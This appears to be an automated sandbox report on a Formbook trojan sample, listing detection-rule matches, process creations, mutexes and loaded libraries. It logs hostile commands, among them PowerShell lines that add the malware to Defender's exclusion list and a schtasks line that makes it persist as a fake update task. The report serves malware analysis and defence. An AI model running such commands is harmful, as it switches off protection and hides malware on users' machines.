Source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2030469230.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: FGGx944Qu7.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TBsjWljiCpR.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.AddAccessRule
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, st1dsKfLn6u0rMPrYT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.AddAccessRule
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FGGx944Qu7.exe.4c2eeb0.4.raw.unpack, KIEnU8WvlckDlH11VR.cs	Security API names: _0020.AddAccessRule

Source: 0.2.FGGx944Qu7.exe.304eefc.2.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.FGGx944Qu7.exe.56f0000.9.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 9.2.TBsjWljiCpR.exe.3114428.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.FGGx944Qu7.exe.303eee4.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/16@6/3

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Mutant created: \Sessions\1\BaseNamedObjects\JCxudnFAElK
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File created: C:\Users\user\AppData\Local\Temp\tmp1454.tmp

Jump to behavior

Source: FGGx944Qu7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FGGx944Qu7.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: SearchProtocolHost.exe, 00000010.00000003.2407226504.0000000002D07000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000003.2407458441.0000000002D28000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000010.00000002.2861704958.0000000002D28000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: FGGx944Qu7.exe	ReversingLabs: Detection: 62%
Source: FGGx944Qu7.exe	Virustotal: Detection: 67%

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File read: C:\Users\user\Desktop\FGGx944Qu7.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process created: C:\Users\user\Desktop\FGGx944Qu7.exe "C:\Users\user\Desktop\FGGx944Qu7.exe"
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp350B.tmp"
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe "C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe"
Source: C:\Program Files (x86)\ATqfrwJeiSEkHpSwLmQcLcKjItaMjYnOwempnyfloVJBHkJly\usFxdnRPYjnb.exe	Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: slc.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: sppc.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
